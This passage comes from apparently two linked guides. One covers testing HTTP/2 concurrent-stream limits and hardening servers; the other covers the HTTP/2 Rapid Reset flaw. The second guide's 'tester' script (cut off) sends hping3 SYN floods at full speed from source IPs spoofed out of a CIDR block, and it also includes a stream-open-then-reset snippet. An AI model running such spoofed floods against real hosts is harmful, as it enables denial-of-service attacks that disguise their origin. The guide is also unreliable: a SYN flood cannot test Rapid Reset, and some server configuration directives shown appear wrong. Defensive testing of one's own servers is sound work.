            self.socket.sendall(self.h2_conn.data_to_send())

            # Receive server settings
            self._receive_data()

            if self.verbose:
                print(f"HTTP/2 connection established to {self.host}:{self.port}")

            return True

        except Exception as e:
            if self.verbose:
                print(f"Connection failed: {e}")
            return False

    def _receive_data(self, timeout: Optional[float] = None) -> List:
        """Receive and process data from server"""
        if timeout:
            self.socket.settimeout(timeout)
        else:
            self.socket.settimeout(self.timeout)

        events = []
        try:
            data = self.socket.recv(65536)
            if not data:
                return events

            events_received = self.h2_conn.receive_data(data)

            for event in events_received:
                events.append(event)

                if isinstance(event, RemoteSettingsChanged):
                    self._handle_settings(event)
                elif isinstance(event, ResponseReceived):
                    if self.verbose:
                        print(f"  Stream {event.stream_id}: Response received")
                elif isinstance(event, DataReceived):
                    if self.verbose:
                        print(f"  Stream {event.stream_id}: Data received ({len(event.data)} bytes)")
                elif isinstance(event, StreamEnded):
                    if self.verbose:
                        print(f"  Stream {event.stream_id}: Ended normally")
                    if event.stream_id in self.active_streams:
                        self.active_streams[event.stream_id]['ended'] = True
                elif isinstance(event, StreamReset):
                    if self.verbose:
                        print(f"  Stream {event.stream_id}: Reset (error code: {event.error_code})")
                    if event.stream_id in self.active_streams:
                        self.active_streams[event.stream_id]['reset'] = True

            # Send any pending data
            data_to_send = self.h2_conn.data_to_send()
            if data_to_send:
                self.socket.sendall(data_to_send)

        except socket.timeout:
            pass
        except Exception as e:
            if self.verbose:
                print(f"Error receiving data: {e}")

        return events

    def _handle_settings(self, event: RemoteSettingsChanged):
        """Handle server settings"""
        for setting, value in event.changed_settings.items():
            setting_name = setting.name if hasattr(setting, 'name') else str(setting)

            if self.verbose:
                print(f"  Server setting: {setting_name} = {value}")

            # Check for MAX_CONCURRENT_STREAMS
            if 'MAX_CONCURRENT_STREAMS' in setting_name:
                self.server_max_streams = value
                if self.verbose:
                    print(f"Server advertises max concurrent streams: {value}")

    def send_stream_request(self, stream_id: int) -> bool:
        """Send a GET request on a specific stream"""
        try:
            headers = [
                (':method', 'GET'),
                (':path', self.path),
                (':scheme', 'https' if self.use_tls else 'http'),
                (':authority', self.host),
                ('user-agent', 'HTTP2-Stream-Limit-Tester/1.0'),
            ]

            self.h2_conn.send_headers(stream_id, headers, end_stream=True)
            data_to_send = self.h2_conn.data_to_send()

            if data_to_send:
                self.socket.sendall(data_to_send)

            self.active_streams[stream_id] = {
                'sent': time.time(),
                'ended': False,
                'reset': False
            }

            return True

        except ProtocolError as e:
            if self.verbose:
                print(f"  Stream {stream_id}: Protocol error - {e}")
            return False
        except Exception as e:
            if self.verbose:
                print(f"  Stream {stream_id}: Failed to send - {e}")
            return False

    def test_concurrent_streams(
        self,
        max_streams_to_test: int = 200,
        batch_size: int = 10,
        delay_between_batches: float = 0.1
    ) -> StreamLimitTestResults:
        """
        Test maximum concurrent streams by opening multiple streams

        Args:
            max_streams_to_test: Maximum number of streams to attempt
            batch_size: Number of streams to open per batch
            delay_between_batches: Delay in seconds between batches
        """
        results = StreamLimitTestResults()
        start_time = time.time()

        print(f"\nTesting HTTP/2 Stream Limits:")
        print(f"  Target: {self.host}:{self.port}")
        print(f"  Max streams to test: {max_streams_to_test}")
        print(f"  Batch size: {batch_size}")
        print("=" * 60)

        try:
            # Connect and get initial settings
            if not self.connect():
                results.errors.append("Failed to establish connection")
                return results

            results.advertised_max_streams = self.server_max_streams

            if self.server_max_streams:
                print(f"\nServer advertised limit: {self.server_max_streams} concurrent streams")
            else:
                print(f"\nServer did not advertise MAX_CONCURRENT_STREAMS limit")

            # Start opening streams in batches
            stream_id = 1  # HTTP/2 client streams use odd numbers
            streams_opened = 0

            while streams_opened < max_streams_to_test:
                batch_count = min(batch_size, max_streams_to_test - streams_opened)

                print(f"\nOpening batch of {batch_count} streams (total: {streams_opened + batch_count})...")

                for _ in range(batch_count):
                    if self.send_stream_request(stream_id):
                        results.successful_streams += 1
                        streams_opened += 1
                    else:
                        results.failed_streams += 1

                    stream_id += 2  # Increment by 2 (odd numbers only)

                # Process any responses
                self._receive_data(timeout=0.5)

                # Check for resets
                reset_count = sum(1 for s in self.active_streams.values() if s.get('reset', False))
                if reset_count > results.reset_streams:
                    new_resets = reset_count - results.reset_streams
                    results.reset_streams = reset_count
                    print(f"  WARNING: {new_resets} stream(s) were reset by server")

                    # If we're getting lots of resets, enforcement is happening
                    if reset_count > (results.successful_streams * 0.1):
                        results.enforcement_detected = True
                        print(f"  Stream limit enforcement detected")

                # Small delay between batches
                if delay_between_batches > 0 and streams_opened < max_streams_to_test:
                    time.sleep(delay_between_batches)

            # Final data reception
            print(f"\nWaiting for final responses...")
            for _ in range(5):
                self._receive_data(timeout=1.0)

            # Calculate actual max streams achieved
            results.actual_max_streams = results.successful_streams - results.reset_streams

        except Exception as e:
            results.errors.append(f"Test error: {str(e)}")
            if self.verbose:
                import traceback
                traceback.print_exc()

        finally:
            results.test_duration = time.time() - start_time
            self.close()

        return results

    def display_results(self, results: StreamLimitTestResults):
        """Display test results"""
        print("\n" + "=" * 60)
        print("STREAM LIMIT TEST RESULTS")
        print("=" * 60)

        print(f"\nServer Configuration:")
        print(f"  Advertised max streams:  {results.advertised_max_streams or 'Not specified'}")

        print(f"\nTest Statistics:")
        print(f"  Successful stream opens: {results.successful_streams}")
        print(f"  Failed stream opens:     {results.failed_streams}")
        print(f"  Streams reset by server: {results.reset_streams}")
        print(f"  Actual max achieved:     {results.actual_max_streams}")
        print(f"  Test duration:           {results.test_duration:.2f}s")

        print(f"\nEnforcement:")
        if results.enforcement_detected:
            print(f"  Stream limit enforcement: DETECTED")
        else:
            print(f"  Stream limit enforcement: NOT DETECTED")

        print("\n" + "=" * 60)
        print("ASSESSMENT")
        print("=" * 60)

        # Provide recommendations
        if results.advertised_max_streams and results.advertised_max_streams > 128:
            print(f"\nWARNING: Advertised limit ({results.advertised_max_streams}) exceeds recommended maximum (128)")
            print("  Consider reducing http2_max_concurrent_streams")
        elif results.advertised_max_streams and results.advertised_max_streams <= 128:
            print(f"\nAdvertised limit ({results.advertised_max_streams}) is within recommended range")

        if not results.enforcement_detected and results.actual_max_streams > 150:
            print(f"\nWARNING: Opened {results.actual_max_streams} streams without enforcement")
            print("  Server may be vulnerable to stream exhaustion attacks")
        elif results.enforcement_detected:
            print(f"\nServer actively enforces stream limits")
            print("  Stream limit protection is working correctly")

        if results.errors:
            print(f"\nErrors encountered:")
            for error in results.errors:
                print(f"  {error}")

        print("=" * 60 + "\n")

    def close(self):
        """Close the connection"""
        try:
            if self.h2_conn:
                self.h2_conn.close_connection()
                if self.socket:
                    data_to_send = self.h2_conn.data_to_send()
                    if data_to_send:
                        self.socket.sendall(data_to_send)

            if self.socket:
                self.socket.close()

            if self.verbose:
                print("Connection closed")
        except Exception as e:
            if self.verbose:
                print(f"Error closing connection: {e}")


def main():
    parser = argparse.ArgumentParser(
        description='Test HTTP/2 server maximum concurrent streams',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Basic test
  python3 http2_stream_limit_tester.py --host example.com

  # Test with custom parameters
  python3 http2_stream_limit_tester.py --host example.com --max-streams 300 --batch 20

  # Verbose output
  python3 http2_stream_limit_tester.py --host example.com --verbose

  # Test specific path
  python3 http2_stream_limit_tester.py --host example.com --path /api/health

  # Test non-TLS HTTP/2 (h2c)
  python3 http2_stream_limit_tester.py --host localhost --port 8080 --no-tls

Prerequisites:
  pip3 install h2 hyper --break-system-packages
        """
    )

    parser.add_argument('--host', required=True, help='Target hostname')
    parser.add_argument('--port', type=int, default=443, help='Target port (default: 443)')
    parser.add_argument('--path', default='/', help='Request path (default: /)')
    parser.add_argument('--no-tls', action='store_true', help='Disable TLS (for h2c testing)')
    parser.add_argument('--max-streams', type=int, default=200,
                       help='Maximum streams to test (default: 200)')
    parser.add_argument('--batch', type=int, default=10,
                       help='Streams per batch (default: 10)')
    parser.add_argument('--delay', type=float, default=0.1,
                       help='Delay between batches in seconds (default: 0.1)')
    parser.add_argument('--timeout', type=int, default=30,
                       help='Connection timeout in seconds (default: 30)')
    parser.add_argument('--verbose', action='store_true', help='Enable verbose output')

    args = parser.parse_args()

    print("=" * 60)
    print("HTTP/2 Maximum Concurrent Streams Tester")
    print("=" * 60)

    tester = HTTP2StreamLimitTester(
        host=args.host,
        port=args.port,
        path=args.path,
        use_tls=not args.no_tls,
        timeout=args.timeout,
        verbose=args.verbose
    )

    try:
        results = tester.test_concurrent_streams(
            max_streams_to_test=args.max_streams,
            batch_size=args.batch,
            delay_between_batches=args.delay
        )

        tester.display_results(results)

    except KeyboardInterrupt:
        print("\n\nTest interrupted by user")
    except Exception as e:
        print(f"\nFatal error: {e}")
        if args.verbose:
            import traceback
            traceback.print_exc()


if __name__ == '__main__':
    main()

5. Using the Script

5.1. Basic Usage

Test your server with default settings:

python3 http2_stream_limit_tester.py --host example.com

5.2. Advanced Examples

Test with increased stream count:

python3 http2_stream_limit_tester.py --host example.com --max-streams 300 --batch 20

Verbose output for debugging:

python3 http2_stream_limit_tester.py --host example.com --verbose

Test specific API endpoint:

python3 http2_stream_limit_tester.py --host api.example.com --path /v1/health

Test non-TLS HTTP/2 (h2c):

python3 http2_stream_limit_tester.py --host localhost --port 8080 --no-tls

Gradual escalation test:

# Start conservative
python3 http2_stream_limit_tester.py --host example.com --max-streams 50

# Increase if server handles well
python3 http2_stream_limit_tester.py --host example.com --max-streams 100

# Push to limits
python3 http2_stream_limit_tester.py --host example.com --max-streams 200

Fast burst test:

python3 http2_stream_limit_tester.py --host example.com --max-streams 150 --batch 30 --delay 0.01

Slow ramp test:

python3 http2_stream_limit_tester.py --host example.com --max-streams 200 --batch 5 --delay 0.5

6. Understanding the Results

The script provides detailed output including:

  1. Advertised max streams: What the server claims to support
  2. Successful stream opens: How many streams were successfully created
  3. Failed stream opens: Streams that failed to open
  4. Streams reset by server: Streams terminated by the server (enforcement)
  5. Actual max achieved: The real concurrent stream limit

6.1. Example Output

Testing HTTP/2 Stream Limits:
  Target: example.com:443
  Max streams to test: 200
  Batch size: 10
============================================================

Server advertised limit: 128 concurrent streams

Opening batch of 10 streams (total: 10)...
Opening batch of 10 streams (total: 20)...
Opening batch of 10 streams (total: 130)...
  WARNING: 5 stream(s) were reset by server
  Stream limit enforcement detected

============================================================
STREAM LIMIT TEST RESULTS
============================================================

Server Configuration:
  Advertised max streams:  128

Test Statistics:
  Successful stream opens: 130
  Failed stream opens:     0
  Streams reset by server: 5
  Actual max achieved:     125
  Test duration:           3.45s

Enforcement:
  Stream limit enforcement: DETECTED

============================================================
ASSESSMENT
============================================================

Advertised limit (128) is within recommended range
Server actively enforces stream limits
  Stream limit protection is working correctly
============================================================

7. Interpreting Different Scenarios

7.1. Scenario 1: Proper Enforcement

Advertised max streams:  100
Successful stream opens: 105
Streams reset by server: 5
Actual max achieved:     100
Stream limit enforcement: DETECTED

Analysis: Server properly enforces the limit. Configuration is working exactly as expected.

7.2. Scenario 2: No Enforcement

Advertised max streams:  128
Successful stream opens: 200
Streams reset by server: 0
Actual max achieved:     200
Stream limit enforcement: NOT DETECTED

Analysis: Server accepts far more streams than advertised. This is a potential vulnerability that should be investigated.

7.3. Scenario 3: No Advertised Limit

Advertised max streams:  Not specified
Successful stream opens: 200
Streams reset by server: 0
Actual max achieved:     200
Stream limit enforcement: NOT DETECTED

Analysis: Server does not advertise or enforce limits. High risk configuration that requires immediate remediation.

7.4. Scenario 4: Conservative Limit

Advertised max streams:  50
Successful stream opens: 55
Streams reset by server: 5
Actual max achieved:     50
Stream limit enforcement: DETECTED

Analysis: Very conservative limit. Good for security but may impact performance for legitimate high-throughput applications.

8. Monitoring During Testing

8.1. Server Side Monitoring

While running tests, monitor your server for resource utilization and connection metrics.

Monitor connection states:

netstat -an | grep :443 | awk '{print $6}' | sort | uniq -c

Count active connections:

netstat -an | grep ESTABLISHED | wc -l

Count SYN_RECV connections:

netstat -an | grep SYN_RECV | wc -l

Monitor system resources:

top -l 1 | head -10

8.2. Web Server Specific Monitoring

For Nginx, watch active connections:

watch -n 1 'curl -s http://localhost/nginx_status | grep Active'

For Apache, monitor server status:

watch -n 1 'curl -s http://localhost/server-status | grep requests'

Check HTTP/2 connections:

netstat -an | grep :443 | grep ESTABLISHED | wc -l

Monitor stream counts (if your server exposes this metric):

curl -s http://localhost:9090/metrics | grep http2_streams

Monitor CPU and memory:

top -l 1 | grep -E "CPU|PhysMem"

Check file descriptors:

lsof -i :443 | wc -l

8.3. Using tcpdump

Monitor packets in real time:

# Watch SYN packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-syn != 0' -n

# Watch RST packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-rst != 0' -n

# Watch specific host and port
sudo tcpdump -i en0 host example.com and port 443 -n

# Save to file for later analysis
sudo tcpdump -i en0 -w test_capture.pcap host example.com

8.4. Using Wireshark

For detailed packet analysis:

# Install Wireshark
brew install --cask wireshark

# Run Wireshark
sudo wireshark

# Or use tshark for command line
tshark -i en0 -f "host example.com"

9. Remediation Steps

If your tests reveal issues, apply these configuration fixes:

9.1. Nginx Configuration

http {
    # Set conservative concurrent stream limit
    http2_max_concurrent_streams 100;

    # Additional protections
    http2_recv_timeout 10s;
    http2_idle_timeout 30s;
    http2_max_field_size 16k;
    http2_max_header_size 32k;
}

9.2. Apache Configuration

Set in httpd.conf or virtual host configuration:

# Set maximum concurrent streams
H2MaxSessionStreams 100

# Additional HTTP/2 settings
H2StreamTimeout 10
H2MinWorkers 10
H2MaxWorkers 150
H2StreamMaxMemSize 65536

9.3. HAProxy Configuration

defaults
    timeout http-request 10s
    timeout http-keep-alive 10s

# Stick table referenced by the frontend below
backend connection_limit
    stick-table type ip size 100k expire 30s store conn_cur

frontend fe_main
    bind :443 ssl crt /path/to/cert.pem alpn h2,http/1.1

    # Limit concurrent connections per source address
    http-request track-sc0 src table connection_limit
    http-request deny if { sc_conn_cur(0) gt 100 }

9.4. Envoy Configuration

static_resources:
  listeners:
  - name: listener_0
    address:
      socket_address:
        address: 0.0.0.0
        port_value: 443
    filter_chains:
    - filters:
      - name: envoy.filters.network.http_connection_manager
        typed_config:
          "@type": type.googleapis.com/envoy.extensions.filters.network.http_connection_manager.v3.HttpConnectionManager
          http2_protocol_options:
            max_concurrent_streams: 100
            initial_stream_window_size: 65536
            initial_connection_window_size: 1048576

9.5. Caddy Configuration

example.com {
    encode gzip

    # HTTP/2 settings
    protocol {
        experimental_http3
        max_concurrent_streams 100
    }

    reverse_proxy localhost:8080
}

10. Combining with Rapid Reset Testing

You can use both the stream limit tester and the Rapid Reset tester together for comprehensive HTTP/2 security assessment:

# Step 1: Test stream limits
python3 http2_stream_limit_tester.py --host example.com

# Step 2: Test rapid reset with IP spoofing
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --cidr 192.168.1.0/24 \
    --packets 1000

# Step 3: Re-test stream limits to verify no degradation
python3 http2_stream_limit_tester.py --host example.com

11. Security Best Practices

11.1. Configuration Guidelines

  1. Set explicit limits: Never rely on default values
  2. Use conservative values: 100-128 streams is the recommended range
  3. Monitor enforcement: Regularly verify that limits are actually being enforced
  4. Document settings: Maintain records of your stream limit configuration
  5. Test after changes: Always test after configuration modifications

11.2. Defense in Depth

Stream limits should be one layer in a comprehensive security strategy:

  1. Stream limits: Prevent excessive concurrent streams per connection
  2. Connection limits: Limit total connections per IP address
  3. Request rate limiting: Throttle requests per second
  4. Resource quotas: Set memory and CPU limits
  5. WAF/DDoS protection: Use cloud-based or on-premise DDoS mitigation

11.3. Regular Testing Schedule

Establish a regular testing schedule:

  • Weekly: Automated basic stream limit tests
  • Monthly: Comprehensive security testing including Rapid Reset
  • After changes: Always test after configuration or infrastructure changes
  • Quarterly: Full security audit including penetration testing
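
For the weekly automated tests, a thin wrapper around the stream limit tester from Section 4 can run against a host list and log anything that needs review. The script location, host list, and log path below are assumptions; adapt them to your environment and schedule the wrapper from cron (for example, once a week at 03:00 on Mondays with "0 3 * * 1") or from your CI system.

#!/usr/bin/env python3
"""Minimal sketch: run http2_stream_limit_tester.py against a host list.

Assumes the tester script from Section 4 is installed at TESTER_PATH;
hosts and log location are illustrative.
"""
import datetime
import subprocess

TESTER_PATH = "/usr/local/bin/http2_stream_limit_tester.py"  # assumption
HOSTS = ["example.com", "api.example.com"]                    # assumption
LOG_FILE = "/var/log/http2_stream_limit_tests.log"

def main():
    timestamp = datetime.datetime.now().isoformat(timespec="seconds")
    with open(LOG_FILE, "a") as log:
        for host in HOSTS:
            try:
                result = subprocess.run(
                    ["python3", TESTER_PATH, "--host", host, "--max-streams", "200"],
                    capture_output=True, text=True, timeout=300,
                )
                output = result.stdout
            except subprocess.TimeoutExpired:
                output = "TIMEOUT"
            suspicious = "NOT DETECTED" in output or "WARNING" in output
            log.write(f"{timestamp} {host} {'REVIEW' if suspicious else 'ok'}\n")
            log.write(output + "\n")

if __name__ == "__main__":
    main()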

12. Troubleshooting

12.1. Common Errors

Error: “SSL: CERTIFICATE_VERIFY_FAILED”

This occurs when testing against servers with self-signed certificates. For testing purposes only, you can modify the script to skip certificate verification (not recommended for production testing).
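If you need to test a host with a self-signed certificate, the relevant change is in the TLS context built inside the script's connect() method. A minimal sketch of that modification follows; it disables verification entirely, so use it only against test systems you control.

# Testing only: accept self-signed certificates by relaxing verification.
# This mirrors the TLS setup in connect(); never use it for production scans.
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
context.set_alpn_protocols(['h2', 'http/1.1'])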

Error: “h2 library not installed”

Install the required library:

pip3 install h2 hyper --break-system-packages

Error: “Connection refused”

Verify the port is open:

telnet example.com 443

Check if HTTP/2 is enabled:

curl -I --http2 https://example.com

Error: “HTTP/2 not negotiated”

The server may not support HTTP/2. Verify with:

curl -I --http2 https://example.com | grep -i http/2

12.2. No Streams Being Reset

If streams are not being reset despite exceeding the advertised limit:

  • Server may not be enforcing limits properly
  • Configuration may not have been applied (restart required)
  • Server may be using a different enforcement mechanism
  • Limits may be set at a different layer (load balancer vs web server)

12.3. High Failure Rate

If many streams fail to open:

  • Network connectivity issues
  • Firewall blocking requests
  • Server resource exhaustion
  • Rate limiting triggering prematurely

13. Understanding the Attack Surface

When testing your infrastructure, consider all HTTP/2 endpoints:

  1. Web servers: Nginx, Apache, IIS
  2. Load balancers: HAProxy, Envoy, ALB
  3. API gateways: Kong, Tyk, AWS API Gateway
  4. CDN endpoints: CloudFlare, Fastly, Akamai
  5. Reverse proxies: Traefik, Caddy

13.1. Testing Strategy

Test at multiple layers:

# Test CDN edge
python3 http2_stream_limit_tester.py --host cdn.example.com

# Test load balancer directly
python3 http2_stream_limit_tester.py --host lb.example.com

# Test origin server
python3 http2_stream_limit_tester.py --host origin.example.com

14. Conclusion

Testing your HTTP/2 maximum concurrent streams configuration is essential for maintaining a secure and performant web infrastructure. This tool allows you to:

  • Verify that your server advertises appropriate stream limits
  • Confirm that advertised limits are actually enforced
  • Identify misconfigurations before they can be exploited
  • Tune performance while maintaining security

Regular testing, combined with proper configuration and monitoring, will help protect your infrastructure against HTTP/2-based attacks while maintaining optimal performance for legitimate users.

15. Additional Resources


This guide and testing script are provided for educational and defensive security purposes only. Always obtain proper authorization before testing systems you do not own.

Testing Your Website for HTTP/2 Rapid Reset Vulnerabilities from a macOS

Introduction

In October 2023, a critical zero-day vulnerability in the HTTP/2 protocol was disclosed that affected virtually every HTTP/2-capable web server and proxy. Known as HTTP/2 Rapid Reset (CVE-2023-44487), the flaw had been exploited in the wild since August 2023 and enabled attackers to launch devastating Distributed Denial of Service (DDoS) attacks with minimal resources. Google reported mitigating the largest DDoS attack ever recorded at the time (398 million requests per second) leveraging this technique.

Understanding this vulnerability and knowing how to test your infrastructure against it is crucial for maintaining a secure and resilient web presence. This guide provides a flexible testing tool, designed specifically for macOS, that uses hping3 for packet crafting with CIDR-based source IP address spoofing.

What is HTTP/2 Rapid Reset?

The HTTP/2 Protocol Foundation

HTTP/2 introduced multiplexing, allowing multiple streams (requests/responses) to be sent concurrently over a single TCP connection. Each stream has a unique identifier and can be independently managed. To cancel a stream, HTTP/2 uses the RST_STREAM frame, which immediately terminates the stream and signals that no further processing is needed.

The Vulnerability Mechanism

The HTTP/2 Rapid Reset attack exploits the asymmetry between client cost and server cost:

  • Client cost: Sending a request followed immediately by a RST_STREAM frame is computationally trivial
  • Server cost: Processing the incoming request (parsing headers, routing, backend queries) consumes significant resources before the cancellation is received

An attacker can:

  1. Open an HTTP/2 connection
  2. Send thousands of requests with incrementing stream IDs
  3. Immediately cancel each request with RST_STREAM frames
  4. Repeat this cycle at extremely high rates

The server receives these requests and begins processing them. Even though the cancellation arrives milliseconds later, the server has already invested CPU, memory, and I/O resources. By sending millions of request-cancel pairs per second, attackers can exhaust server resources with minimal bandwidth.
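
To make the frame sequence concrete, the sketch below uses the h2 Python library to open a single stream and cancel it immediately with RST_STREAM. The target host is a placeholder, and the snippet sends exactly one request-cancel pair purely to illustrate the mechanics; only run it against systems you own or are authorized to test.

#!/usr/bin/env python3
"""Illustrative sketch of the HEADERS-then-RST_STREAM sequence using h2.

Target host is an assumption; this sends a single request-cancel pair.
"""
import socket
import ssl

from h2.config import H2Configuration
from h2.connection import H2Connection
from h2.errors import ErrorCodes

HOST = "example.com"   # assumption: replace with a host you are authorized to test
PORT = 443

def main():
    ctx = ssl.create_default_context()
    ctx.set_alpn_protocols(["h2"])
    raw = socket.create_connection((HOST, PORT), timeout=10)
    sock = ctx.wrap_socket(raw, server_hostname=HOST)
    if sock.selected_alpn_protocol() != "h2":
        raise SystemExit("HTTP/2 not negotiated")

    conn = H2Connection(H2Configuration(client_side=True))
    conn.initiate_connection()

    headers = [
        (":method", "GET"),
        (":path", "/"),
        (":scheme", "https"),
        (":authority", HOST),
    ]

    # The cheap client side of the pattern: open a stream, then cancel it
    # before the server finishes the work it has already started.
    stream_id = 1
    conn.send_headers(stream_id, headers, end_stream=False)
    conn.reset_stream(stream_id, error_code=ErrorCodes.CANCEL)
    sock.sendall(conn.data_to_send())

    conn.close_connection()
    sock.sendall(conn.data_to_send())
    sock.close()

if __name__ == "__main__":
    main()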

Why It’s So Effective

Traditional rate limiting and DDoS mitigation techniques struggle against Rapid Reset attacks because:

  • Low bandwidth usage: The attack uses minimal data (mostly HTTP/2 frames with small headers)
  • Valid protocol behavior: RST_STREAM is a legitimate HTTP/2 mechanism
  • Connection reuse: Attackers multiplex thousands of streams over relatively few connections
  • Amplification: Each cheap client operation triggers expensive server side processing

How to Guard Against HTTP/2 Rapid Reset

1. Update Your Software Stack

Immediate Priority: Ensure all HTTP/2 capable components are patched:

Web Servers:

  • Nginx 1.25.2+ or 1.24.1+
  • Apache HTTP Server 2.4.58+
  • Caddy 2.7.4+
  • LiteSpeed 6.0.12+

Reverse Proxies and Load Balancers:

  • HAProxy 2.8.2+ or 2.6.15+
  • Envoy 1.27.0+
  • Traefik 2.10.5+

CDN and Cloud Services:

  • CloudFlare (auto patched August 2023)
  • AWS ALB/CloudFront (patched)
  • Azure Front Door (patched)
  • Google Cloud Load Balancer (patched)

Application Servers:

  • Tomcat 10.1.13+, 9.0.80+
  • Jetty 12.0.1+, 11.0.16+, 10.0.16+
  • Node.js 20.8.0+, 18.18.0+
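
A quick way to compare an individual host against the minimum versions listed above is to scrape the version strings of the installed components. The sketch below checks a few common binaries; the commands and parsing are assumptions and will need adjusting for your systems.

#!/usr/bin/env python3
"""Minimal sketch: print local component versions to compare against
the patched minimums listed above. Commands are common defaults and
may differ on your systems."""
import re
import subprocess

CHECKS = [
    ("nginx", ["nginx", "-v"]),        # nginx prints its version to stderr
    ("apache", ["apachectl", "-v"]),
    ("haproxy", ["haproxy", "-v"]),
    ("node", ["node", "--version"]),
]

def version_of(cmd):
    try:
        proc = subprocess.run(cmd, capture_output=True, text=True, timeout=10)
    except FileNotFoundError:
        return "not installed"
    output = (proc.stdout or "") + (proc.stderr or "")
    match = re.search(r"(\d+\.\d+(?:\.\d+)?)", output)
    return match.group(1) if match else "unknown"

def main():
    for name, cmd in CHECKS:
        print(f"{name:<8} {version_of(cmd)}")

if __name__ == "__main__":
    main()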

2. Implement Stream Limits

Configure strict limits on HTTP/2 stream behavior:

# Nginx configuration
http2_max_concurrent_streams 128;
http2_recv_timeout 10s;

# Apache HTTP Server
H2MaxSessionStreams 100
H2StreamTimeout 10

# HAProxy configuration
defaults
    timeout http-request 10s
    timeout http-keep-alive 10s

frontend https-in
    stick-table type ip size 100k expire 30s store http_req_rate(10s)
    option http-use-htx
    http-request track-sc0 src
    http-request deny if { sc_http_req_rate(0) gt 100 }

3. Deploy Rate Limiting

Implement multi layered rate limiting:

Connection level limits:

limit_conn_zone $binary_remote_addr zone=addr:10m;
limit_conn addr 10;  # Max 10 concurrent connections per IP

Request level limits:

limit_req_zone $binary_remote_addr zone=req_limit:10m rate=50r/s;
limit_req zone=req_limit burst=20 nodelay;

Stream cancellation tracking:

# Newer Nginx versions track RST_STREAM rates
http2_max_concurrent_streams 100;
http2_max_field_size 16k;
http2_max_header_size 32k;

4. Infrastructure Level Protections

Use a WAF or DDoS Protection Service:

  • CloudFlare (includes Rapid Reset protection)
  • AWS Shield Advanced
  • Azure DDoS Protection Standard
  • Imperva/Akamai

Enable Connection Draining:

# Gracefully handle connection resets
http2_recv_buffer_size 256k;
keepalive_timeout 60s;
keepalive_requests 100;

5. Monitoring and Alerting

Track critical metrics:

  • HTTP/2 stream reset rates
  • Concurrent stream counts per connection
  • Request cancellation patterns
  • CPU and memory usage spikes
  • Unusual traffic patterns from specific IPs

Example Prometheus query:

rate(nginx_http_requests_total{status="499"}[5m]) > 100

6. Consider HTTP/2 Disabling (Temporary Measure)

If you cannot immediately patch:

# Nginx: Disable HTTP/2 temporarily
listen 443 ssl;  # Remove http2 parameter
# Apache: Disable HTTP/2 module
# a2dismod http2

Note: This reduces performance benefits but eliminates the vulnerability.

Testing Script for HTTP/2 Rapid Reset Vulnerabilities on macOS

Below is a parameterized Python script that tests your web servers using hping3 for packet crafting. This script is specifically optimized for macOS and can spoof source IP addresses from a CIDR block to simulate distributed attacks. Using hping3 ensures IP spoofing works consistently across different network environments.

Prerequisites for macOS

Installation Steps:

# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

# Install hping3
brew install hping

Note: This script requires root/sudo privileges for packet crafting and IP spoofing.

The Testing Script

cat > http2rapidresettester_macos.py << 'EOF'
#!/usr/bin/env python3
"""
HTTP/2 Rapid Reset Vulnerability Tester for macOS
Tests web servers for susceptibility to CVE-2023-44487
Uses hping3 for packet crafting with source IP spoofing from CIDR block

Usage:
    sudo python3 http2rapidresettester_macos.py --host example.com --port 443 --cidr 192.168.1.0/24 --packets 1000

Requirements:
    brew install hping
"""

import argparse
import subprocess
import random
import ipaddress
import time
import sys
import os
import platform
from typing import List, Optional

class HTTP2RapidResetTester:
    def __init__(
        self,
        host: str,
        port: int = 443,
        cidr_block: str = None,
        timeout: int = 30,
        verbose: bool = False,
        interface: str = None
    ):
        self.host = host
        self.port = port
        self.cidr_block = cidr_block
        self.timeout = timeout
        self.verbose = verbose
        self.interface = interface
        self.source_ips: List[str] = []

        # Verify running on macOS
        if platform.system() != 'Darwin':
            print("WARNING: This script is optimized for macOS")

        if not self.check_hping3():
            raise RuntimeError("hping3 is not installed. Install with: brew install hping")

        if not self.check_root():
            raise RuntimeError("This script requires root privileges (use sudo)")

        if cidr_block:
            self.generate_source_ips()
            
        if interface:
            self.verify_interface()

    def check_hping3(self) -> bool:
        """Check if hping3 is installed"""
        try:
            result = subprocess.run(
                ['which', 'hping3'],
                capture_output=True,
                text=True,
                timeout=5
            )
            if result.returncode == 0:
                return True

            # Try alternative hping command
            result = subprocess.run(
                ['which', 'hping'],
                capture_output=True,
                text=True,
                timeout=5
            )
            return result.returncode == 0
        except Exception as e:
            print(f"Error checking for hping3: {e}")
            return False

    def check_root(self) -> bool:
        """Check if running with root privileges"""
        return os.geteuid() == 0

    def verify_interface(self):
        """Verify that the specified network interface exists"""
        try:
            result = subprocess.run(
                ['ifconfig', self.interface],
                capture_output=True,
                text=True,
                timeout=5
            )
            if result.returncode != 0:
                raise RuntimeError(f"Network interface '{self.interface}' not found")
            
            if self.verbose:
                print(f"Using network interface: {self.interface}")
                
        except subprocess.TimeoutExpired:
            raise RuntimeError(f"Timeout verifying interface '{self.interface}'")
        except FileNotFoundError:
            raise RuntimeError("ifconfig command not found")

    def generate_source_ips(self):
        """Generate list of IP addresses from CIDR block"""
        try:
            network = ipaddress.ip_network(self.cidr_block, strict=False)
            self.source_ips = [str(ip) for ip in network.hosts()]

            if len(self.source_ips) == 0:
                # Handle /32 or /31 networks
                self.source_ips = [str(ip) for ip in network]

            print(f"Generated {len(self.source_ips)} source IPs from {self.cidr_block}")

        except ValueError as e:
            print(f"Invalid CIDR block: {e}")
            sys.exit(1)

    def get_random_source_ip(self) -> Optional[str]:
        """Get a random IP address from the CIDR block"""
        if not self.source_ips:
            return None
        return random.choice(self.source_ips)

    def get_hping_command(self) -> str:
        """Determine which hping command is available"""
        result = subprocess.run(['which', 'hping3'], capture_output=True, text=True)
        if result.returncode == 0:
            return 'hping3'
        return 'hping'

    def craft_syn_packet(self, source_ip: str, count: int = 1) -> bool:
        """
        Craft TCP SYN packet using hping3

        Args:
            source_ip: Source IP address to spoof
            count: Number of packets to send

        Returns:
            True if successful, False otherwise
        """
        try:
            hping_cmd = self.get_hping_command()
            cmd = [
                hping_cmd,
                '-S',  # SYN flag
                '-p', str(self.port),  # Destination port
                '-c', str(count),  # Packet count
                '--fast',  # Send packets as fast as possible
            ]

            if source_ip:
                cmd.extend(['-a', source_ip])  # Spoof source IP

            if self.interface:
